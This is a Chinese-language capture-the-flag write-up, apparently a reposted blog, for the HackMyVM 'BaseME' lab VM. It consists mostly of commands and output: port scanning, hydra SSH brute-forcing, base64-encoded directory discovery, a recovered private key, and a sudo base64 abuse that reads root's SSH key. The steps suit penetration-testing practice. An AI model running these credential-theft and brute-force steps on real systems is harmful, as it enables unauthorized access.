HackMyVM-BaseME

2024-04-18 21:20
文章标签 hackmyvm baseme

本文主要是介绍HackMyVM-BaseME,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!


目录

信息收集

arp

nmap

WEB

web信息收集

gobuster

hydra

目录检索

ssh

提权

get user

sudo base64提权

get root


信息收集

arp
┌─[root@parrot]─[~/HackMyVM]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.115
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.9.123  08:00:27:01:05:5e  PCS Systemtechnik GmbH10 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.929 seconds (132.71 hosts/sec). 10 responded

nmap
端口扫描┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.123 --min-rate 1000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-18 09:38 GMT
Nmap scan report for 192.168.9.123
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:01:05:5E (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 4.09 seconds
服务版本设置┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -O -p 22,80 192.168.9.123 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-18 09:38 GMT
Nmap scan report for 192.168.9.123
Host is up (0.00090s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)
|   256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)
|_  256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:01:05:5E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.86 seconds

WEB

web信息收集

┌─[root@parrot]─[~/HackMyVM]
└──╼ #echo "QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK" | base64 -dALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
-lucas译:
所有,绝对所有你需要的都在BASE64。
包括您需要的密码:)
请记住,BASE64可以回答您的所有问题。
-卢卡斯我们得到一个用户名: lucas

iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme这个很可能时密码!

gobuster
┌─[root@parrot]─[~/HackMyVM]
└──╼ #gobuster dir -u http://192.168.9.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.123/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================啥都没有!

hydra
┌─[root@parrot]─[~/HackMyVM]
└──╼ #hydra -l lucas -P D.list ssh://192.168.9.123
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-18 09:51:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking ssh://192.168.9.123:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-18 09:51:55
爆破失败!看来我们需要把密码进行base64编码一下!因为提示告诉了我们!
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat user.list 
lucas
bHVjYXM=
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat pass.list 
aWxvdmV5b3UK
eW91bG92ZXlvdQ==
c2hlbG92ZXN5b3U=
aGVsb3Zlc3lvdQ==
d2Vsb3ZleW91
dGhleWhhdGVzbWU=
iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme
┌─[root@parrot]─[~/HackMyVM]
└──╼ #hydra -L user.list -P pass.list ssh://192.168.9.123
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-18 09:58:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:2/p:12), ~2 tries per task
[DATA] attacking ssh://192.168.9.123:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-18 09:58:24
还是失败了!我们换个思路吧!

目录检索
想了半天也只有这种可能了!把目录编码成base64,然后检索!
# 我写了一个脚本用来处理编码import base64 # 导入包with open('directory-list-lowercase-2.3-medium.txt',mode='r') as file: # 打开需要编码的目录文件lines = file.readlines() # 读取每一行!for line in lines: # 开始for循环!encoded_line = base64.b64encode(line.rstrip().encode('utf-8')) # 利用rstrip()函数和base64.b64encode方法,将每一行编码成base64格式!print(f"{encoded_line.decode('utf-8')}")
┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.123/ -w dir_base64.list -x 403,404_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 207640Output File: /root/HackMyVM/reports/http_192.168.9.123/__24-04-18_10-24-18.txtTarget: http://192.168.9.123/[10:24:18] Starting: 
[10:32:42] 200 -    2KB - /aWRfcnNhCg==Task Completed

┌─[root@parrot]─[~/HackMyVM]
└──╼ #wget http://192.168.9.123/aWRfcnNhCg==
--2024-04-18 10:37:28--  http://192.168.9.123/aWRfcnNhCg==
正在连接 192.168.9.123:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2537 (2.5K) [application/octet-stream]
正在保存至: “aWRfcnNhCg==”aWRfcnNhCg==                  100%[=================================================>]   2.48K  --.-KB/s  用时 0s      2024-04-18 10:37:28 (847 MB/s) - 已保存 “aWRfcnNhCg==” [2537/2537])┌─[root@parrot]─[~/HackMyVM]
└──╼ #ls1.py            dir_base64.list                           pass.list    port.nmap   reports
'aWRfcnNhCg=='   directory-list-lowercase-2.3-medium.txt   port.gnmap   port.xml    user.list
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 'aWRfcnNhCg==' 
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB
QUFBQ21GbGN6STFOaTFqZEhJQUFBQUdZbU55ZVhCMEFBQUFHQUFBQUJCVHhlOFlVTApCdHpmZnRB
ZFBncDhZWkFBQUFFQUFBQUFFQUFBRVhBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDWkNY
dkVQbk8xCmNiaHhxY3RCRWNCRFpqcXJGZm9sd1ZLbXBCZ1kwN00zQ0s3cE8xMFVnQnNMeVl3QXpK
RXc0ZTZZZ1BOU3lDRFdGYU5US0cKMDdqZ2NncmdncmU4ZVBDTU5GQkNBR2FZSG1MckZJc0tEQ0xJ
NE5FNTR0NThJVUhlWENaejcyeFRvYkwvcHRMazI2UkJuaAo3YkhHMUpqR2x4T2tPNm0rMW9GTkx0
TnVEMlFQbDhzYlp0RXpYNFM5bk5aL2RweVJwTWZtQjczck4zeXlJeWxldlZERXl2CmY3Q1o3b1JP
NDZ1RGdGUHk1VnprbmRDZUpGMll0WkJYZjVnamMyZmFqTVh2cStiOG9sOFJaWjZqSFhBaGlibEJY
d3BBbTQKdkxZZnh6STI3QlpGbm90ZUJuYmR6d1NMNWFwQkY1Z1lXSkFIS2ovSjZNaERqMUdLQUZj
MUFBQUQwTjlVRFRjVXh3TXQ1WApZRklaSzhpZUJMME5PdXdvY2RnYlV1a3RDMjFTZG5TeTZvY1cz
aW1NKzNteldqUGRvQksvSG8zMzl1UG1CV0k1c2JNcnBLCnhrWk1ubCtyY1RiZ3o0c3d2OGdOdUto
VWM3d1RndHJOWCtQTk1kSUFMTnBzeFlMdC9sNTZHSzhSNEo4ZkxJVTUrTW9qUnMKKzFOcllzOEo0
cm5PMXFXTm9KUlpvRGxBYVlxQlY5NWNYb0FFa3dVSFZ1c3RmZ3hVdHJZS3ArWVBGSWd4OG9rTWpK
Z25iaQpOTlczVHp4bHVOaTVvVWhhbEgyREoya2hLREdRVWk5Uk9GY3NFWGVKWHQzbGdwWlp0MWhy
UURBMW84alRYZVM0K2RXN25aCnpqZjNwME03N2IvTnZjWkUrb1hZUTFnNVhwMVFTT1Niait0bG13
NTRMN0VxYjFVaFpnblE3WnNLQ29hWTlTdUFjcW0zRTAKSUpoK0krWnYxZWdTTVMvRE9ISXhPM3Bz
UWtjaUxqa3BhK0d0d1FNbDFaQUpIUWFCNnE3MEpKY0JDZlZzeWtkWTUyTEtESQpweFpZcExabXlE
eDhUVGFBOEpPbXZHcGZOWmtNVTRJMGk1L1pUNjVTUkZKMU5sQkNOd2N3dE9sOWs0UFc1TFZ4TnNH
UkNKCk1KcjhrNUFjMENYMDNmWEVTcG1zVVVWUysvRGovaG50SHc4OWRPOEhjcXFJVUVwZUViZlRX
THZheDBDaVNoM0tqU2NlSnAKKzhnVXlER3ZDa2N5Vm5lVVFqbW1yUnN3UmhUTnh4S1JCWnNla0d3
SHBvOGhEWWJVRUZacXp6TEFRYkJJQWRybDF0dDdtVgp0VkJybXBNNkN3SmR6WUVsMjFGYUs4anZk
eUN3UHI1SFVndHV4clNwTHZuZGNud1BheEpXR2k0UDQ3MUREWmVSWURHY1doCmk2YklDckxRZ2VK
bEhhRVVtclFDNVJkdjAzendJOVU4RFhVWi9PSGI0MFBMOE1YcUJ0VS9iNkNFVTlKdXpKcEJyS1or
aysKdFNuN2hyOGhwcFQydFVTeER2QytVU01tdy9XRGZha2pmSHBvTndoN1B0NWkwY3d3cGtYRlF4
SlB2UjBiTHh2WFpuKzN4dwpON2J3NDVGaEJaQ3NIQ0FiVjIraFZzUDBseXhDUU9qN3lHa0JqYTg3
UzFlMHE2V1pqakI0U3ByZW5Ia083dGc1UTBIc3VNCkFpZi8wMkhIeldHK0NSL0lHbEZzTnRxMXZ5
bHQyeCtZLzA5MXZDa1JPQkRhd2pIei84b2d5MkZ6ZzhKWVRlb0xrSHdER1EKTytUb3dBMTBSQVRl
azZaRUl4aDZTbXRERy9WNXplV0N1RW1LNHNSVDNxMUZTdnBCMS9IK0Z4c0dDb1BJZzhGemNpR0No
MgpUTHVza2NYaWFnbnM5TjFSTE9ubEhoaVpkOFJaQTBaZzdvWklhQnZhWm5oWllHeWNwQUpwV0tl
YmpydG9rTFl1TWZYUkxsCjMvU0FlVWw3MkVBM20xRElueHNQZ3VGdWswMHJvTWM3N042ZXJZN3Rq
T1pMVllQb1NpeWdEUjFBN2Yzell6KzBpRkk0ckwKTkQ4aWtnbVF2RjZocnd3SkJycC8weEtFYU1U
Q0tMdnl5WjNlRFNkQkRQcmtUaGhGd3JQcEk2K0V4OFJ2Y1dJNmJUSkFXSgpMZG1tUlhVUy9EdE8r
NjkvYWlkdnhHQVlvYisxTT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
aWRfcnNhCg==也就是id_rsa解码一下,是一个私钥!应该就是 lucas 用户的!

ssh
┌─[root@parrot]─[~/HackMyVM]
└──╼ #ssh -i id_rsa lucas@192.168.9.123
Enter passphrase for key 'id_rsa': 
lucas@192.168.9.123's password: 
Permission denied, please try again.
lucas@192.168.9.123's password: 
Permission denied, please try again.
lucas@192.168.9.123's password: 
lucas@192.168.9.123: Permission denied (publickey,password).欧玛噶!还是需要密码!
iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesmeaWxvdmV5b3UK
eW91bG92ZXlvdQo=
c2hlbG92ZXN5b3UK
aGVsb3Zlc3lvdQo=
d2Vsb3ZleW91Cg==
dGhleWhhdGVzbWUK
经过我的尝试,这个其中一个是密钥!(aWxvdmV5b3UK)
┌─[root@parrot]─[~/HackMyVM]
└──╼ #ssh -i id_rsa lucas@192.168.9.123
Enter passphrase for key 'id_rsa': 
Linux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 28 12:51:36 2020 from 192.168.1.58
lucas@baseme:~$

提权

get user
lucas@baseme:~$ ls
user.txt
lucas@baseme:~$ cat user.txt .     **                                     *           *.                                  ,*                                *,                             ,                         ,*                           .,                              *,                        /                                    *                      ,*                                        *,                   /.                                            .*.                *                                                  **              ,*                                               ,*                **                                          *.                  **                                    **.                    ,*                                **                       *,                          ,*                          *                      **                            *,                .*                               *.           **                                 **      ,*,                                   ** *,                                      HMV8nnJAJAJA 
sudo base64提权
lucas@baseme:~$ sudo -l
Matching Defaults entries for lucas on baseme:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser lucas may run the following commands on baseme:(ALL) NOPASSWD: /usr/bin/base64
lucas@baseme:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
lucas@baseme:/$ sudo base64 /root/.ssh/id_rsa | base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ/Z0FFp2B
IdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp
DEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT/pWXvGI3tk
/Ku/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7
px+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C/p51j3gI6b8yz9a
S+DtdTpDwQAAA8D82/wZ/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ
7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx
YQngA5crv7m/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v
zEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx/cX6Vv0n2TAqEWD14s7lAO
4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo/SMGBZxUvpig
yLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6
oBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5
SEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr
nCO2g8VMnT/cTyAv/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R/cqPPyAYaQIa9Z+kS6ou9R
iMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq
vWystPARwiUs7WYBUHRf6bPP/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG
ptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz
X2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR
fKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD
SiTwFsmITP//njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe
FWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6/GUKXF5
rFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR
txBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an
2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU=
-----END OPENSSH PRIVATE KEY-----
我们尝试将 /root/.ssh/id_rsa 文件的内容进行 Base64 编码,然后将编码后的内容进行 Base64 解码!
lucas@baseme:/tmp$ ls
id_rsa  systemd-private-113b476f3bf14226a2ddb50a96f9da04-systemd-timesyncd.service-95q5Gk
lucas@baseme:/tmp$ chmod 600 id_rsa 
lucas@baseme:/tmp$ ssh -i id_rsa root@127.0.0.2
The authenticity of host '127.0.0.2 (127.0.0.2)' can't be established.
ECDSA key fingerprint is SHA256:Hlyr217g0zTkGOpiqimkeklOhJ4kYRLtHyEh0IgMEbM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.2' (ECDSA) to the list of known hosts.
Linux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 28 12:47:13 2020 from 192.168.1.59
root@baseme:~# id
uid=0(root) gid=0(root) groups=0(root)
root@baseme:~# 
get root
root@baseme:~# cd /root
root@baseme:~# ls
root.txt
root@baseme:~# cat root.txt .     **                                     *           *.                                  ,*                                *,                             ,                         ,*                           .,                              *,                        /                                    *                      ,*                                        *,                   /.                                            .*.                *                                                  **              ,*                                               ,*                **                                          *.                  **                                    **.                    ,*                                **                       *,                          ,*                          *                      **                            *,                .*                               *.           **                                 **      ,*,                                   ** *,                                      HMVFKBS64

这篇关于HackMyVM-BaseME的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/915863

相关文章

dentacare - hackmyvm

简介 靶机名称:dentacare 难度:中等 靶场地址:https://hackmyvm.eu/machines/machine.php?vm=dentacare 本地环境 虚拟机:vitual box 靶场IP(dentacare):192.168.56.120 跳板机IP(windows 11):192.168.56.1 192.168.190.100 渗透机IP(kali)

HackMyVM-Minimal

目录 信息收集 arp nmap nikto whatweb WEB web信息收集 gobuster 文件包含漏洞 提权 web信息收集 main方法 question_1 question_2 question_3 prize.txt 软连接 信息收集 arp ┌──(root?0x00)-[~/HackMyVM]└─# arp-s

【hackmyvm】 Animetronic靶机

靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 ` arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址 port 通过nmap扫描,获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists]└─# nmap -sT -sV

HackMyVM-Alzheimer

目录 信息收集 arp nmap FTP服务信息收集 匿名登陆 关键信息 knock WEB信息收集 信息收集 gobuster 目录爆破 ssh登录 提权 系统信息收集 提权 get root 信息收集 arp ┌──(root㉿0x00)-[~/HackMyVM]└─# arp-scan -lInterface: eth0, typ

HackMyVM-Hommie

目录 信息收集 arp nmap WEB web信息收集 dirsearch ftp tftp ssh连接 提权 系统信息收集 ssh提权 信息收集 arp ┌──(root㉿0x00)-[~/HackMyVM]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 08:00:27:77:ed:8

[HackMyVM]靶场Boxing

难度:Medium kali:192.168.56.104 靶机:192.168.56.143 端口扫描 ┌──(root㉿kali2)-[~/Desktop]└─# nmap 192.168.56.143Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 19:25 CSTNmap scan report for sta

[HackMyVM]靶场Pipy

难度:easy kali:192.168.56.104 靶机:192.168.56.141 端口扫描 ┌──(root㉿kali2)-[~/Desktop]└─# nmap 192.168.56.141 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-31 20:10 CSTNmap scan

[HackMyVM]靶场Crossbow

kali:192.168.56.104 靶机:192.168.56.136 端口扫描 # nmap 192.168.56.136 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-26 22:17 CSTNmap scan report for crossbow.hmv (192.168.56.136)Host

[HackMyVM]靶场 Liceo

kali:192.168.56.104 靶机:192.168.56.124      端口扫描 nmap 192.168.56.124 # nmap 192.168.56.124Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-22 10:56 CSTNmap scan report for 192.168.56.124Hos

[HackMyVM]靶场 Zon

kali:192.168.56.104 主机发现 arp-scan -l # arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/a